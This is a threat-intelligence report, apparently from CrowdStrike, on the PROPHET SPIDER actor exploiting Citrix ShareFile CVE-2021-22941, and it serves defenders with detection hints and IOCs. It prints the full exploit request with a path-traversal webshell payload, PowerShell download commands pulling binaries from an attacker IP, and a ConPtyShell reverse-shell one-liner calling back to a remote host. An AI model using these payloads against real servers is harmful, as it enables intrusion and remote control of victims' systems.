PROPHET SPIDER Exploits Citrix ShareFile Remote Code Execution Vulnerability CVE-2021-22941 to Deliver Webshell

At the start of 2022, CrowdStrike Intelligence and CrowdStrike Services investigated an incident in which PROPHET SPIDER exploited CVE-2021-22941 — a remote code execution (RCE) vulnerability impacting Citrix ShareFile Storage Zones Controller — to compromise a Microsoft Internet Information Services (IIS) web server. The adversary exploited the vulnerability to deploy a webshell that enabled the downloading of additional tools. This incident highlights how PROPHET SPIDER continues to evolve their tradecraft while continuing to exploit known web-server vulnerabilities.

Background

PROPHET SPIDER

PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by compromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in multiple instances.

CVE-2021-22941

In September 2021, Citrix disclosed a relative path-traversal vulnerability in ShareFile Zones Storage Controller, designated CVE-2021-22941. Shortly thereafter, security researchers demonstrated a proof-of-concept (POC) exploit for the CVE. Based on the known technical details, others were able to reproduce fully weaponized exploits for CVE-2021-22941 that have proliferated since mid-October 2021. The vulnerability allows an adversary to overwrite an existing file on a target server via an uploadid parameter passed in an HTTP GET request.

Initial Access and Exploitation

On Jan. 10, 2022, PROPHET SPIDER sent an HTTP POST request to an IIS server of a CrowdStrike Falcon®® platform customer, using the user agent python-requests/2.26.0. The request to /upload.aspx contained the following command:

POST /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123

There are three key components to this request.

The URI endpoint /upload.aspx is used for ShareFile uploads and usually comes with parameters to define upload object specifications, such as uploadid, cid or batchid. In this case, the uploadid parameter contained a webshell:

uploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();string+cmd+=+Request.QueryString[str_idx0];string+arg+=+Request.QueryString[str_idx1];Process.Start(cmd,arg);}

This is content that the exploit will write to an ASP.NET file; it uses Razor syntax, where @<keyword> allows a keyword to be used as a variable name, and @{ is used to open a C# code block. The C# Process.Start(cmd,arg); method provides the backdoor function that will be used to execute arbitrary commands.

/../../ConfigService\Views\Shared\Error.cshtml

This is the relative path traversal that will allow the payload to overwrite the legitimate Error.cshtml page.

bp=123&accountid=123

These are parameters that are expected by the upload function and included to prevent an error from occurring. Additionally, these values match the default characters used in the previously mentioned publicly available CVE-2021-22941 exploit.

Analysts looking for evidence of attempted CVE-2021-22941 exploitation can examine IIS access logs for web requests that:

  • Target upload.aspx
  • Contain encoded strings for ../ and ConfigService\Views\Shared\Error.cshtml in the URL parameters
  • May contain &bp=123&accountid=123 if the attacker has not customized the payload

Once the webshell is set, it can be accessed by sending an HTTP request to /configservice/Home/Error with one or two URL parameters. ASP.NET will direct these requests to Error.cshtml, which usually contains a simple HTML header saying “Sorry, an error occurred while processing your request.” Due to the exploit, the contents have been replaced with the C# code block and will invoke Process.Start(cmd.arg) using the URL parameter(s) passed in the GET request.

Post-exploitation Commands 

After achieving initial access, PROPHET SPIDER used the following command to test connectivity:

CMD.exe /C nslookup xab8v404gwftvw5nvw95ig6ybphf54.burpcollaborator[.]net</code

If successful, this command performs a name lookup on a subdomain of burpcollaborator[.]net, which the open-source vulnerability-testing tool BurpSuite can check to confirm responding systems.

The adversary next attempted to execute encoded PowerShell commands that decoded to:

powershell -Command (New-Object System.Net.WebClient).DownloadFile('http[:]//45.61.136[.]39:443/wget[.]bin','C:\Windows\temp\wget.bin')

cmd /c c:\Windows\temp\wget.bin -t 1 http[:]//45.61.136[.]39:443/winn.exe -O c:\windows\temp\wi.exe

These commands attempted to download the legitimate wget utility from a remote IP address, then attempted to use wget to download another remote binary, named winn.exe. The winn.exe download was unsuccessful. The adversary then attempted to install an open-source reverse shell from GitHub:

powershell -Command IEX(IWR https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 107.181.187[.]184 -RemotePort 4242 -Rows 44 -Cols 166

This payload attempted to load the ConPtyShell reverse shell directly from GitHub, with parameters to connect back to the IP address 107.181.187[.]184 over TCP port 4242.

Conclusion

As CrowdStrike Intelligence previously reported, PROPHET SPIDER is an opportunistic eCrime actor that exploits publicly disclosed server vulnerabilities, often to deliver webshells. This recent CVE-2021-22941 exploitation demonstrates the adversary’s willingness to operationalize new and different exploit code, as well as their enduring preference for deploying the wget utility to begin operations.

Indicators of Compromise (IOCs)

DescriptionIP Addresses
Site hosting wget.bin and winn.exe45.61.136<.>39
Callback destination for ConPtyShell reverse shell107.181.187<.>184
Source observed exploiting CVE-2021-22941188.119.149<.>160
Site hosting ConPtyShell reverse shellhxxps<:>//raw.githubusercontent<.>com /antonioCoco/ConPtyShell/master /Invoke-ConPtyShell.ps1

MITRE ATT&CK® Observed Tactics

TacticDescription
Initial AccessT1190: Exploit Public Facing Application
ExecutionT1059.001: Command and Scripting Interpreter: PowerShell
PersistenceT1505.003: Server Software Component: Web Shell
Command and ControlT1071: Application Layer Protocol
 T1105: Ingress Tool Transfer

Additional Resources

Breaches Stop Here